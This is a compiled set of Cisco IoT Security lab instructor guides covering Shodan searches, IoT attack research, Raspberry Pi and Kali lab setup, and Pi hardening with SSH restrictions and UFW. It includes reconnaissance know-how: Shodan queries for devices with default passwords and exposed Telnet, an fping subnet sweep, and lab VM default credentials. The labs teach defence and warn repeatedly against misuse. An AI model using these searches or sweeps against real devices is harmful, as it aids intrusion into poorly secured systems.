Objectives
Part 1: Obtain Access to Shodan’s Free Features
Part 2: Investigate Connected IoT Devices
Background / Scenario
Warning: Do not attempt to log in to any device you find on the Shodan search engine. Doing so violates your
ethical hacking agreement.
In this lab, you will use the Shodan search engine to gain an understanding of why security should be the
focus of any IoT implementation.
Shodan has servers located around the world that continually crawl the Internet looking for connected
devices. It can find specific devices and device types. This data can then be searched. Some of the more
popular searches include terms such as "webcam", "default passwords", "routers", "video games," and more.
Shodan is a favorite tool used by researchers, security professionals, large enterprises, and computer
emergency response teams (CERTs).
• Researchers can use Shodan to data mine information about what devices are connected, where they
are connected, and what services are exposed.
• Security professionals can use Shodan as part of a penetration testing plan to discover devices that need
to be hardened to prevent potential attacks.
• Large enterprises employ security professionals who should be aware of tools like Shodan for
determining the current risk profile of the enterprise’s connected devices.
• CERTs can use Shodan to quickly generate reports about an emerging attack on connected devices.
Shodan is also a tool used by nefarious individuals and groups commonly referred to as threat actors. Shodan
can accelerate a threat actor’s reconnaissance of Internet connected devices. Like all the tools in this course,
you must use it responsibly according to your organization’s ethical hacking policies.
Instructor Note: Shodan is a powerful website where students can easily get into trouble. For example,
students can find default login information and use it to access the configuration webpage for a device. This
violates ethical hacking agreements.
Required Resources
• Device with Internet access.
• SANS Penetration Testing article, “Getting the Most Out of Shodan Searches”
2018 - 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 5 www.netacad.com
Lab - Shodan Search
1) If you click Create a Free Account, you will be directed to a page where you can fill in a form to
create an account on Shodan.
2) If you click Login or Register, you will be directed to a page where you can sign in with one of
several other accounts that you may have, including Google or Facebook.
c. After successfully logging in, you will see your account page, as shown below. Click the Shodan link to
return to the homepage.
Note: Not all devices discovered by Shodan are vulnerable. Shodan results consist of Internet-connected
devices and information about those devices. This information may or may not reveal potential
vulnerabilities.
d. On the right side, the main section of your search shows the devices that match your search. Find an
entry that looks interesting to you and fill in the information below.
IP address: ___________________________________________________________________________
Hostname: ___________________________________________________________________________
ISP: ________________________________________________________________________________
Date the entry was added: _______________________________________________________________
Country: _____________________________________________________________________________
e. Your entry will also show some banner information. You may see the beginnings of an SSH banner or an
HTTP banner. Click Details for more information about your entry. You should see several open ports. If
not, try a different entry. List the information you found below.
City and Country: ______________________________________________________________________
Ports open: __________________________________________________________________________
Services running: ______________________________________________________________________
Key types: ___________________________________________________________________________
Answers will vary. Encourage students to look for a variety of open ports including 22 (SSH), 25 (SMTP),
80 (HTTP), 123 (NTP), and 443 (HTTPS). They should be able to find one that lists the encryption keys
for SSH.
f. Return to the Shodan homepage and click Explore. What are some of the Top Voted results?
____________________________________________________________________________________
At the time of testing this lab, Top Voted results included Webcam, Cams, Netcam, default password, and
dreambox.
One of the Top Voted results for you may have been default password. If so, click default password to
see the results. If not, in the search field, type the keywords “default password,” with the quotes, and
press Enter. You will see several results that show default passwords embedded in the banners for
devices. Hopefully, the owners of these devices have changed the default password. However, this
highlights how easy it can be to log in to a device if appropriate security measures are not implemented.
Warning: Do not attempt to log in to any device you find on the Shodan search engine. Doing so violates
your ethical hacking agreement.
g. In the search field, type the keyword “webcam” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was over 6,000.
h. In the search field, type the keyword “refrigerator” with the quotes and press Enter. What is your count for
Total Results?
____________________________________________________________________________________
At the time of testing this lab, Total Results was 193.
Step 2: Use keywords together with search operators to filter your search.
You may have noticed that you can only get two pages of results with your free account access. However,
even with a paid account you would not want to click through the pages that list thousands or millions of
results. Instead, you can combine keywords and search operators to filter your results.
Shodan searches for the services running on a device. It then collects banner information for each service.
For example, here is the banner information for the SNMP service running on a Cisco device found with the
Shodan search:
Cisco Internetwork Operating System Software
IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(23)BC10, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2011 by cisco Systems, Inc.
A search for just "cisco" most likely reveals one to two million results for you. That information may be helpful
to you. However, if you are interested in more specific information, you will want to filter your search using
filter names and values from the banner information.
For example, if you are interested in seeing how many Cisco 7200 routers in the United States are running
the SNMP service, you would enter the following search phrase.
country:US product:"Cisco 7200 Router" port:161
Note: Shodan searches use the two-letter (alpha-2) country code defined in the International Organization
for Standardization’s ISO 3166 standard (ISO 3166-1993).
Create your own searches to find the following:
a. Minecraft is a popular video game where players can set up their own servers for others to access online.
Use an Internet search to find the following information.
What is the common port number used by Minecraft servers? ____________ 25565
What is the ISO 3166 alpha-2 code for South Africa? __________ ZA
What Shodan search phrase can you use to discover how many Minecraft servers are currently online in
South Africa?
____________________________________________________________________________________
Minecraft port:"25565" country:"ZA"
How many Minecraft servers are currently online in South Africa? ________________________________
At the time of testing this lab, Total Results was 318.
b. Moxa is a supplier of devices that connect industrial equipment to the Internet. How many Moxa devices
are running the Telnet service in Brazil?
Search phrase: _______________________________________________________________________
moxa port:"23" country:"BR"
Total results:
____________________________________________________________________________________
At the time of testing this lab, Total Results was 5.
c. Use an Internet search or review Shodan help pages and tutorials to discover how you can filter your
searches based on a range of IP addresses.
d. Mr. Robot is an American drama television series that chronicles the adventures of a cybersecurity
engineer. In the series, the protagonist uses the Shodan search engine to research a fictional corporation.
Use an Internet search to find the search string that was used to discover E Corp’s web server.
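The following Python example, added here and not part of the Cisco lab, shows how the fields a crawler indexes from a banner (the Cisco IOS SNMP banner quoted in Step 2) become the name:value filters used in exercises a and b. It assumes the IOS version-line format shown in that banner and that a filter value is quoted only when it contains whitespace (Shodan accepts both port:161 and port:"161").

```python
"""Added example (not part of the Cisco lab): how the banner fields Shodan
indexes turn into the name:value filters the lab uses.

Assumptions: parse_ios_banner() understands only the Cisco IOS version-line
format shown in the lab's SNMP banner; build_query() quotes a value only when
it contains whitespace (Shodan accepts both port:161 and port:"161").
"""
import re
from typing import Dict, Optional

# Constructed copy of the SNMP banner quoted in the lab.
CISCO_BANNER = (
    "Cisco Internetwork Operating System Software\n"
    "IOS (tm) 7200 Software (UBR7200-IK9SU2-M), Version 12.3(23)BC10, "
    "RELEASE SOFTWARE (fc1)\n"
    "Technical Support: http://www.cisco.com/techsupport\n"
    "Copyright (c) 1986-2011 by cisco Systems, Inc.\n"
)

# "IOS (tm) <platform> Software (<image>), Version <version>, ..."
_IOS_VERSION_LINE = re.compile(
    r"IOS \(tm\) (?P<platform>\S+) Software \((?P<image>[^)]+)\), "
    r"Version (?P<version>[^,]+),"
)
_ALPHA2 = re.compile(r"[A-Z]{2}")


def parse_ios_banner(banner: str) -> Optional[Dict[str, str]]:
    """Extract platform, image name and IOS version from a Cisco IOS banner.

    Returns None when the version line is absent. These fields are what a
    crawler indexes, so an SNMP or Telnet banner left reachable from the
    Internet discloses the exact software build, not just an open port.
    """
    m = _IOS_VERSION_LINE.search(banner)
    if not m:
        return None
    return {"platform": m["platform"], "image": m["image"], "version": m["version"]}


def shodan_filter(name: str, value) -> str:
    """Render one name:value filter, validating the filters the lab uses."""
    value = str(value)
    if name == "country" and not _ALPHA2.fullmatch(value):
        raise ValueError(f"country needs an ISO 3166-1 alpha-2 code, got {value!r}")
    if name == "port" and not (value.isdigit() and 1 <= int(value) <= 65535):
        raise ValueError(f"port must be 1-65535, got {value!r}")
    if '"' in value:
        raise ValueError("filter values may not contain double quotes")
    if re.search(r"\s", value):
        value = f'"{value}"'   # unquoted spaces would split the value into keywords
    return f"{name}:{value}"


def build_query(keywords: str = "", **filters) -> str:
    """Combine free-text keywords with name:value filters in the given order."""
    parts = [keywords.strip()] if keywords.strip() else []
    parts += [shodan_filter(name, value) for name, value in filters.items()]
    return " ".join(parts)


if __name__ == "__main__":
    print(parse_ios_banner(CISCO_BANNER))
    print(build_query(country="US", product="Cisco 7200 Router", port=161))
    print(build_query("Minecraft", port=25565, country="ZA"))
```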
Lab - Evaluate Recent IoT Attacks (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Research Recent IoT Attacks
Part 2: Describe Mitigation Techniques
Background / Scenario
As the number of IoT devices continues to grow at an exponential rate, so does the number of attacks on these
devices. A wide variety of attacks on IoT devices have been documented and reported in the
news.
As an IT professional working with IoT devices, it is important to be aware of the wide range of attacks and
vulnerabilities that have occurred on these devices. It is also important to know how to defend against and
minimize the damage from these types of attacks.
Required Resources
PC or mobile device with Internet access
Attack #1:
_______________________________________________________________________________________
DDoS attack on DNS provider Dyn.
Cyber attack that knocked out major websites such as Twitter, GitHub, Spotify, and Shopify.
The Mirai botnet targets poorly protected IoT connected devices and uses them to launch a DDoS attack
against specific targets. A Chinese electronics manufacturer admitted that its products inadvertently contributed
to this attack. In this particular attack, the Mirai botnet used DVRs and IP cameras made by a Chinese
electronics manufacturer.
http://www.foxnews.com/tech/2016/10/25/ddos-attackers-exploited-insecure-iot-gadgets-from-chinese-company.amp.html
Attack #2:
_______________________________________________________________________________________
Attack #3:
_______________________________________________________________________________________
Attack #2:
_______________________________________________________________________________________
Attack #3:
_______________________________________________________________________________________
Lab - Evaluate Home Automation Products (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Conduct Research for Home Automation Products
Part 2: Prepare a Presentation
Background / Scenario
In this lab, you will investigate the wide variety of home automation products. Some products may require
monitoring or maintenance services, so your geographical location will most likely have an impact on your
choices.
Assume you have a budget of $1000 (or equivalent local currency) and the choice of one primary objective for
home automation:
Increases convenience
Enhances security
Saves energy
You will choose an objective and conduct online research to find home automation products to satisfy your
objective. You will then select the desired products keeping the total cost under $1,000 and prepare a
presentation about what you bought, how it achieves your goal, and how the system will be used by the
customer.
Instructor Note: This is an open-ended lab assignment. Answers will vary widely based on what the student
chooses as an objective and the location. The primary purpose of the lab is for students to build an awareness of
the wide variety of offerings available for home automation.
Required Resources
PC or mobile device with Internet access
Presentation preparation software
Describe your goals for this project. What was your objective?
Describe the products that you chose for purchase including their complete cost.
How close to $1000 did you spend?
Describe how the products help achieve your goals.
Explain what your new system would look like and how it functions.
Use the following space to draft your notes for presentation preparation.
_______________________________________________________________________________________
Lab - Evaluate the IoT Security Risk in an Industry Sector
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Objectives
Part 1: Research Risks for an Industry Sector
Part 2: Investigate the Potential Impact of a Security Breach
Part 3: Describe Security Measures for Your Industry Sector
Background / Scenario
Any implementation of IoT is going to have risk associated with it. Risks could range from fairly insignificant to
very destructive depending on the market, equipment, number of people affected, and numerous other
factors.
In this lab, you will research an industry sector and evaluate the risks associated with implementing an IoT
solution. One of the following industry sectors will be assigned to you.
agriculture
automotive
banking
construction
education
healthcare
manufacturing
mining
retail
technology industries
utilities
Instructor Note: This would be a good activity to have students work in groups to brainstorm some ideas and
then present their findings in a quick 5-minute executive summary. Also, it may be worthwhile to initiate a
discussion within the course forum to solicit more dialog.
Required Resources
Computer with Internet access to be used for research
a. What types of communications services or protocols are used for connecting IoT devices in your industry
sector?
____________________________________________________________________________________
____________________________________________________________________________________
Wired or wireless Ethernet, serial communication, I2C, Bluetooth, cellular, HTTP, HTTPS
b. What are some of the known vulnerabilities?
____________________________________________________________________________________
____________________________________________________________________________________
Wi-Fi with weak encryption, HTTP sent in plaintext, Bluetooth connections that can be hijacked, serial communication
that can be tapped, and Ethernet traffic in general that can be sniffed and captured.
c. What type of data is being transmitted or stored?
____________________________________________________________________________________
____________________________________________________________________________________
Would altering the data transmitted or stored be damaging? Altered data such as health readings could
pose a life-threatening situation. Data such as storm information could cause a panic much like what
happened in Hawaii earlier this year.
d. What types of equipment are being monitored or managed?
____________________________________________________________________________________
____________________________________________________________________________________
Depending on the vertical, equipment monitored could be anything from a healthcare device to electrical
grid equipment.
e. What other questions are unique to your industry sector?
____________________________________________________________________________________
Lab - Set Up PL-App on a Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Lab Topology
Objectives
Set up a Raspberry Pi board as a Prototyping Lab Application (PL-App) device
Use PL-App Launcher to provision and discover PL-App devices
Background
The IoT Security lab topology uses a Raspberry Pi that is connected to a PC. The PC will be used to work
with Python and Jupyter notebooks that are running on the Raspberry Pi. In addition, for some labs, the PC
will run a virtual machine (VM) that interacts with the Pi.
PL-App consists of two components. The first is the PL-App Launcher application that runs on the PC. It is
used to provision a PL-App image that is written to a microSD (µSD) card for the Raspberry Pi. The second
is PL-App itself, which runs on the Raspberry Pi. It contains the Jupyter Notebook software and provides access to
the notebooks and other functions of the Raspberry Pi.
With PL-App, you can access existing IoT Fundamentals labs in the Course Materials folder or write your own
new applications directly on the Raspberry Pi, execute them, and monitor the output from the board with
various visualizations.
Required Resources
PL-App Launcher application
PL-App Image file
Wired Ethernet or Wi-Fi connection to the local-area network with DHCP
Raspberry Pi with a power adapter
Google Chrome or other modern web browser
8 GB µSD card
b. If your Raspberry Pi will be connected to the network over Wi-Fi, enter the optional settings section and
configure the following:
o Wi-Fi SSID - The name of the Wi-Fi network to join (e.g. ClassroomWiFi)
o Wi-Fi Password - The WPA2 Pre-Shared Key
c. When your settings are correct, click the Write Disk Image button to write the PL-App image to the
selected SD card. This will overwrite all data on the card. The process will also write your configuration
settings to the SD card in a file called chestnut.txt. Depending on the speed of your µSD card, this
process might take 5-10 minutes to complete.
Note: If the µSD card has already been flashed with the PL-App image, and you only want to change the
existing settings (e.g. Device Name, Wireless Settings, etc.), then click the Update Config Only button to
update only the setup configuration.
d. When the µSD card setup is complete, use the file explorer to verify the contents of the µSD card. You
should see the µSD card drive name has changed to CISCO-PLAPP.
e. Explore the µSD card drive. You should see the notebooks folder and the chestnut.txt setup file:
o The D:\chestnut.txt file contains the setup information that was created using the PL-App Launcher. If
you need to change any of these settings, you can either use the PL-App Launcher with the Update
Config Only button to update these settings and preserve all the other contents of the SD card, or
edit this file manually.
o The D:\notebooks\Course Materials folder contains all the default notebook files that were bundled
with the release of the PL-App image that was flashed on the µSD card. If you want the most recent,
or unmodified, version of the lab notebooks, download the notebooks zip archive from the course
page and unpack it to the D:\notebooks\Course Materials\coursename folder (the drive letter D: might
be different on your computer). You can also easily back up either your own notebook files or the
Course Materials by copying this folder to your computer.
f. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
placing an empty file named ssh in D drive (D:\ssh). When the Raspberry Pi boots, SSH is enabled when
the file is found, and the file ssh is deleted from the file system.
g. Before removing the µSD card from your computer, make sure to safely unmount it by right-clicking the
drive and selecting Eject USB Storage.
h. Remove the µSD card from your computer.
Alternate Step 4 for Advanced Linux users: Set up a µSD card with PL-App
This is a command-line only guide for advanced Linux users. Be very careful. Incorrect use of these tools
might overwrite the data on your primary hard disk. All the existing contents of the µSD card will be
overwritten in this step.
a. Change the current working directory to the location of the PL-App image zip file that you downloaded
previously:
cd Downloads
b. Identify the device name of your µSD card (e.g. sdb):
sudo fdisk -l
c. Check if any of the µSD card partitions are mounted using the mount command and then unmount them.
d. Using dd, transfer the PL-App image to your µSD card. Use caution at this step: selecting the wrong output
device for the "of=" parameter can overwrite your own hard disk drive and your own data. unzip -p writes the
named archive member (the image file) to standard output, and dd copies it to the card:
unzip -p PL-App-xxxxxx.zip chestnut.img | sudo dd bs=1M of=/dev/{SD card device name}
e. Wait for dd to complete. It might take 5-10 minutes without showing any output. Be patient.
f. When completed, remove the µSD card USB reader, wait a second, and then plug it back in to mount the
newly created partition on it.
g. In the mounted µSD card partition (FAT file system, 1 GB in size, labeled CISCO-PLAPP), create a new text
file called chestnut.txt with the following contents:
Device_Name="{YOUR-NETACAD-USERNAME}-{YOUR-RPi-DEVICE-NAME}"
Device_Password="{YOUR-PL-App-PASSWORD}"
SSID="{YOUR-WIFI-SSID}"
Wifi_Password="{YOUR-WIFI-PASSWORD}"
Example:
Device_Name="myNetAcadUsername-myRPi1"
Device_Password="this is my device password"
SSID="ClassroomWIFI"
Wifi_Password="WPA2password"
h. You will need secure shell (SSH) access to your Raspberry Pi in later labs. SSH can be enabled by
creating an empty file named ssh in CISCO-PLAPP partition. When the Raspberry Pi boots, SSH is
enabled when the file is found, and the file ssh is deleted from the file system.
touch ssh
i. Unmount and remove the µSD card USB reader from your computer.
j. Make sure your Linux computer supports mDNS discovery of hostnames:
sudo apt-get install libnss-mdns
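The following Python helper is added here and is not Cisco's tooling. It covers the two hand-made files from steps g and h (chestnut.txt and the empty ssh flag) and adds the check the warning at the start of this step calls for: the dd target must be a whole removable disk with nothing mounted. The key names and the {user}-{device} naming come from the lab; the validation rules, function names and the sysfs and mounts-table lookups are this example's own assumptions.

```python
"""Added helper for the Linux "Alternate Step 4" (not Cisco's tooling).

Assumptions: chestnut.txt uses the four KEY="value" lines shown in the lab
with no documented escaping; a removable disk is one whose
/sys/block/<dev>/removable flag reads 1; mounted partitions appear in
/proc/mounts. Both paths are parameters so the check can be exercised offline.
"""
import re
from pathlib import Path
from typing import Dict, List

# chestnut.txt keys in the order the lab lists them.
CHESTNUT_KEYS = ("Device_Name", "Device_Password", "SSID", "Wifi_Password")


def render_chestnut(settings: Dict[str, str]) -> str:
    """Return chestnut.txt contents as KEY="value" lines.

    Values holding a double quote or a line break are rejected rather than
    written in a form the Pi might misread. An empty SSID means a wired
    setup; otherwise the Wi-Fi password must be a WPA2 passphrase of 8-63
    characters.
    """
    missing = [k for k in CHESTNUT_KEYS if k not in settings]
    if missing:
        raise ValueError(f"missing settings: {missing}")
    for key in CHESTNUT_KEYS:
        if any(ch in settings[key] for ch in '"\r\n'):
            raise ValueError(f"{key} may not contain quotes or line breaks")
    if not re.fullmatch(r"[^\s-]+-\S+", settings["Device_Name"]):
        raise ValueError("Device_Name must look like NETACADUSER-DEVICENAME")
    if settings["SSID"] and not 8 <= len(settings["Wifi_Password"]) <= 63:
        raise ValueError("Wifi_Password must be 8-63 characters for WPA2")
    return "".join(f'{key}="{settings[key]}"\n' for key in CHESTNUT_KEYS)


def check_target_device(dev: str, sys_block: str = "/sys/block",
                        mounts: str = "/proc/mounts") -> str:
    """Vet a whole-disk name such as "sdb" before it goes into dd's of= parameter.

    Refuses partition names, disks sysfs does not flag as removable, and disks
    with any partition listed in the mounts table. Returns the /dev path.
    """
    if not re.fullmatch(r"sd[a-z]+|mmcblk\d+", dev):
        raise ValueError(f"{dev!r} is not a whole-disk name such as sdb or mmcblk0")
    flag = Path(sys_block, dev, "removable")
    if not flag.is_file():
        raise ValueError(f"no block device named {dev}")
    if flag.read_text().strip() != "1":
        raise ValueError(f"/dev/{dev} is not removable; refusing to overwrite it")
    part = re.compile(rf"/dev/{dev}(p?\d+)?")   # sdb, sdb1, mmcblk0p1 ...
    for line in Path(mounts).read_text().splitlines():
        fields = line.split()
        if fields and part.fullmatch(fields[0]):
            raise ValueError(f"{fields[0]} is mounted; unmount it before running dd")
    return f"/dev/{dev}"


def write_setup_files(mountpoint: str, settings: Dict[str, str],
                      enable_ssh: bool = True) -> List[str]:
    """Write chestnut.txt and the ssh flag file into the mounted CISCO-PLAPP partition."""
    root = Path(mountpoint)
    (root / "chestnut.txt").write_text(render_chestnut(settings))
    written = ["chestnut.txt"]
    if enable_ssh:
        (root / "ssh").touch()   # the Pi enables SSH and deletes this file on boot
        written.append("ssh")
    return written


if __name__ == "__main__":
    # Constructed sample matching the lab's own example values.
    print(render_chestnut({
        "Device_Name": "myNetAcadUsername-myRPi1",
        "Device_Password": "this is my device password",
        "SSID": "ClassroomWIFI",
        "Wifi_Password": "WPA2password",
    }), end="")
```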
b. Before entering or removing the µSD card, always make sure that the Raspberry Pi is powered off.
c. Connect the Raspberry Pi to the LAN. If you are using an Ethernet cable, connect the cable to the
Raspberry Pi. Your computer and the Raspberry Pi must be in the same subnet for the PL-App Launcher
discovery to work.
Note: Some labs require Internet connectivity, so a separate Internet connection is desirable.
Instructor Note: The LAN should provide IP addresses to the Raspberry Pi devices using DHCP. In
addition, the network must not block multicast communication. Auto-configured APIPA addresses may
also be used for labs that do not require a connection to the Internet or other LAN resources.
d. Recommended network topology for a classroom with PL-App:
e. Power on your Raspberry Pi by connecting the micro USB cable with a power supply that provides
enough current to the Raspberry Pi board. The recommended PSU provides 2.5A to power the Raspberry
Pi 3 Model B.
Note: The red Power LED must be on. If the Power LED is blinking, or is off, the power source from the
PSU is not providing enough power to the board.
f. Start the PL-App Launcher application on a PC that is on the same network as the Raspberry Pi. You
should see the following screen with the Available Devices tab:
g. The Available Devices tab lists all the PL-App devices that have been set up on this computer with
PL-App Launcher, or that were manually added to the list using the Add Device Name button.
PL-App Launcher is continuously trying to discover the listed PL-App Raspberry Pi devices even if they
are not connected to the network. When a device is discovered, its current IP address is shown in the list
and the Connect button turns green.
Note: The first startup of a freshly written µSD card might take longer to connect due to the initial setup
process (expanding the file system of the µSD card, etc.).
Instructor Note: PL-App Launcher uses multicast DNS (mDNS, Bonjour) to discover the listed PL-App
Raspberry Pi devices. Without mDNS routing configured, the discovery mechanism only works within a
single subnet segment. If the network is blocking multicast communication, PL-App Launcher will be
unable to discover connected devices. In that case, try selecting the “Use Broadcast mDNS” option in the
PL-App Launcher to fall back from multicast to broadcast packets.
As mentioned above, only PL-App images created on this computer show up in the list of available
devices; a device can also be added manually, but its device name must be entered to do so.
h. Click the green Connect button of your device in PL-App Launcher to directly connect to the local PL-App
web interface that is running on your Raspberry Pi. This opens a new web browser window and
establishes a connection to the selected PL-App over HTTP.
i. Log in to the web interface of PL-App. Use the device password you specified in PL-App Launcher in the
setup process of the µSD card.
After a successful login, the PL-App directory browser opens the root directory of the notebooks:
This is the PL-App’s representation of the notebooks folder that was created on the µSD card.
The basic structure of the folders in the root notebooks directory is as follows:
o Course Materials: this folder contains Cisco authored labs in the form of Jupyter Notebooks.
o myfiles: this folder is your space to create your own Jupyter Notebooks and other files.
Lab – Set Up the IoT Security Lab Topology (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Set Up the Lab Environment
Part 2: Import the IoT Security Virtual Machines
Background / Scenario
Computing power and resources have increased tremendously over the last 10 years. A benefit of having
multicore processors and large amounts of RAM is the ability to use virtualization. With virtualization, one or
more virtual computers operate inside one physical computer. Virtual computers that run within physical
computers are called virtual machines (VMs). VMs are often called guests, and physical computers are often
called hosts. Anyone with a modern computer and operating system can run VMs.
In this lab, you will set up and explore the lab environment that will be used in this course. A VM is used for
many of the labs in this course. The VM is created with Oracle VirtualBox and an Oracle virtual appliance
(OVA) file. The OVA file contains a special version of Linux called Kali. Kali is a very popular Linux distribution
that contains many tools that are used for assessing network security. VirtualBox allows you to run this
version of Linux on a Mac or PC as a VM. You can use this VM to interact with other hosts on the lab network.
Note: Only use Kali tools on networks on which you are authorized to do so. Abuse of the Kali tools will be a
violation of your ethical hacking agreement.
Required Resources
Host computer with at least 4 GB of RAM and 15 GB of free disk space
Oracle VirtualBox
IoT Security Kali Linux OVA and Metasploitable OVA files
Internet connection
An Ethernet patch cable
b. A new window will appear presenting the settings suggested in the OVA archive. Check the "Reinitialize
the MAC address of all network cards" box at the bottom of the window. Leave all other settings as
default. Click Import.
c. After the import is complete, VirtualBox will show the new Kali VM in its inventory. Your Kali Linux VM file
name might be different than the graphic shown below.
d. After Kali starts, you should see the desktop as shown below.
e. Click the Terminal icon in the desktop applications bar as shown in the figure.
f. Run the shell script that will configure IP addressing. To run the script, at the terminal prompt type the
following:
root@kali:~# ./lab_support_files/scripts/start_dhcp.sh
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
g. After the script executes, at the terminal prompt, type ifconfig.
root@kali:~# ifconfig
What IP address was assigned to the VM eth0 interface? ____________________________ 203.0.113.1
h. Minimize the VirtualBox window and open PL-App. Select the Available Devices tab. You should see your
Raspberry Pi listed. Make note of the IP address of your Raspberry Pi.
IP address of the Raspberry Pi: ___________________________________
Note: If PL-App is not showing the IP address of the Raspberry Pi, use the command fping at the
terminal window to determine the IP address.
root@kali:~# fping -a -r 0 -g 203.0.113.0/24
Warning: The use of fping can be considered as an attack. Please do not use this command on a
production network.
i. Return to the VM. At a terminal prompt, ping the IP address of your Raspberry Pi. Use the -c 5 parameter
to limit your ping to five echo requests. If everything is working properly, you should see five successful
echo replies. You have now tested the connection between the Kali Linux virtual machine and the
Raspberry Pi.
j. Now open the Firefox ESR browser from the Kali desktop applications bar. Its icon is just above the
Terminal icon.
k. Type the IP address of the Raspberry Pi into the address bar and press Enter. You should see the
Jupyter notebooks home page appear.
Note: Because the VM shares the same network adapter as the physical computer, you can access the
Pi from either machine.
l. Start and log into the Metasploitable VM. Notice the displayed messages.
What is the login credential?
____________________________________________________________________________________
Username: msfadmin password: msfadmin
What is the IP address assigned to Metasploitable VM? What was the command used to determine the IP
address?
____________________________________________________________________________________
The IP address is 203.0.113.5. The command used to determine the IP address is ifconfig.
Note: To release the mouse from Metasploitable VM, press the right control key.
m. To verify network connectivity, you should be able to ping all the VMs and the Raspberry Pi.
Lab - Harden a Raspberry Pi (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.
Topology
Objectives
Part 1: Securing Remote Access
Part 2: Removing the Default Pi User Account
Part 3: Configuring the Uncomplicated Firewall (UFW)
Background/Scenario
The Raspberry Pi is a doorway to the Internet of Things (IoT). In this lab you will take a Raspberry Pi that is
acting as an IoT gateway device and perform device hardening. You will harden the Raspberry Pi by following
recommended security practices for the Raspbian OS. You will also limit the network protocols and services
allowed to connect to the IoT gateway by activating and configuring the Uncomplicated Firewall (UFW).
Finally, you will utilize a separate Kali VM with the Kali Linux OS, acting as a threat actor, to test the security
of the IoT gateway.
Required Resources
Raspberry Pi 3 Model B or later (with PL-App)
8GB Micro SD card (minimum required)
PC with IoTSec Kali VM
Network connectivity between PC and Raspberry Pi
on the Pi are enabled, unknown users on the network could attempt a connection using these default
credentials. While basic security would advise the changing of the password for the “pi” user, having a default
username alone is a security risk.
c. To stop the Raspberry Pi from logging in to a user account automatically at boot, issue the sudo raspi-config
terminal command.
pi@IoTpi:~ $ sudo raspi-config
d. Select Boot Options to configure options for start-up.
e. Select Desktop / CLI to choose whether to boot into a desktop environment or the command line.
f. Select Console to require users to log into text console.
g. Select Finish and click Yes to reboot when prompted.
h. After reboot, use the Kali VM to SSH into the kingbob account of the IoTpi.
root@kali:~# ssh kingbob@203.0.113.12
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
The AllowUsers kingbob command permits SSH authentication using the username and password for
the local kingbob account. The DenyUsers kevin command prevents SSH authentication using the kevin
credentials.
c. To force the SSH settings to take effect now, restart the SSH service using sudo systemctl restart ssh.
kingbob@IoTpi:~ $ sudo systemctl restart ssh
d. Verify that the kevin user account cannot be exploited by a threat actor via the SSH service. Issue the
command ssh kevin@203.0.113.12 to attempt an SSH connection with the kevin username.
root@kali:~# ssh kevin@203.0.113.12
e. After you enter the password for the kevin user account, the IoT gateway reports that SSH access is denied.
kevin@203.0.113.12's password:
Permission denied, please try again.
f. SSH into the Raspberry Pi using the kingbob account, which is permitted to access the IoTpi via SSH.
root@kali:~# ssh kingbob@203.0.113.12
Step 1: Open a terminal and remove the Pi account but leave the directory.
a. To remove the pi account from the IoT gateway, make sure you are logged into the “kingbob” account.
Then, enter the sudo deluser pi command in the terminal.
kingbob@IoTpi:~ $ sudo deluser pi
Removing user `pi' ...
Warning: group `pi' has no more members.
Done.
____________________________________________________________________________________
Search for pi in /etc/passwd or other files that have username info. A sample command to look for pi: grep
pi /etc/passwd
Rules updated
Rules updated (v6)
d. To activate the UFW firewall, which is disabled by default, enter sudo ufw enable. Ensure that you have
added the allow ssh statement to the UFW before activating the UFW firewall.
kingbob@IoTpi:~ $ sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
Instructor Note: If a student accidentally enables UFW without first permitting SSH, the Pi will be
unreachable over the network. If this occurs, you may be able to access the Pi directly by connecting a
keyboard and monitor, or by creating a new SD card image with PL-App.
e. Observe the UFW firewall rules.
You should see the UFW rules that you have created using the sudo ufw status command.
kingbob@IoTpi:~ $ sudo ufw status
Status: active
To Action From
-- ------ ----
80/tcp DENY Anywhere
23/tcp DENY Anywhere
21/tcp DENY Anywhere
22/tcp ALLOW Anywhere
80/tcp (v6) DENY Anywhere (v6)
23/tcp (v6) DENY Anywhere (v6)
21/tcp (v6) DENY Anywhere (v6)
22/tcp (v6) ALLOW Anywhere (v6)
The ALLOW statements show which connections are permitted; everything else is denied.
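The following is an added example (not part of the Cisco lab files) that audits the two hardening steps this lab describes: the AllowUsers/DenyUsers lines in sshd_config (Part 1) and the rule table printed by sudo ufw status (Part 3). The sshd_config fragment and the status text are constructed copies of what the lab shows; the user names and rule set are the lab's own. A practitioner would run the same checks over the real files pulled from the Pi.

```python
# Audit the lab's SSH user restrictions and UFW rule table. Added example, not
# Cisco's code; SSHD_CONFIG and UFW_STATUS below are constructed from the lab.
import re

# Constructed sshd_config fragment containing the two directives the lab adds.
SSHD_CONFIG = """\
Port 22
PasswordAuthentication yes
AllowUsers kingbob
DenyUsers kevin
"""

# Constructed copy of the `sudo ufw status` output shown in the lab.
UFW_STATUS = """\
Status: active

To                         Action      From
--                         ------      ----
80/tcp                     DENY        Anywhere
23/tcp                     DENY        Anywhere
21/tcp                     DENY        Anywhere
22/tcp                     ALLOW       Anywhere
80/tcp (v6)                DENY        Anywhere (v6)
23/tcp (v6)                DENY        Anywhere (v6)
21/tcp (v6)                DENY        Anywhere (v6)
22/tcp (v6)                ALLOW       Anywhere (v6)
"""


def parse_sshd_users(config_text):
    """Return (allow, deny) user sets from AllowUsers/DenyUsers directives."""
    allow, deny = set(), set()
    for line in config_text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        if not line:
            continue
        key, _, value = line.partition(" ")
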